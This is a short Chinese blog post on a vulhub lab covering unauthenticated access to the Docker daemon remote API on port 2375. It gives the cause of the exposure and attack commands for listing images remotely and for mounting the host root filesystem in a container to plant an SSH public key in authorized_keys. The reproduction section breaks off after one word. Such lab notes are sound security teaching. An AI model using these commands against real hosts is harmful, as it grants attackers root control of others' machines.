vulhub漏洞—docker_daemon_api未授权访问漏洞
docker remote api
docker remote api主要的目的是取代命令行界面,
docker client和docker daemon通过unix domain socket进行通信.
默认情况下,只有本机的root和docker组用户才能操作docker.
漏洞成因
dockerd -H unix:///var/run/docker. sock -H 0.0. 0.0:2375
docker守护进程监听在0.0.0.0,外网可访问
没有使用iptable等限制可连接的来源ip
漏洞危害及常见的攻击方式
1.远程对被攻击主机的docker容器进行操作
docker -H tcp://*.*.*.*:2375 images
2.远程启动被攻击主机的docker容器,并挂载宿主机的目录,通过容器来修改宿主机的author ized_ keys文件,写入公钥。
docker H tcp://*.*.*.*:2375 run -it-v /:/mnt imagelD /bin/sh
漏洞复现
vulhu
共有 0 条评论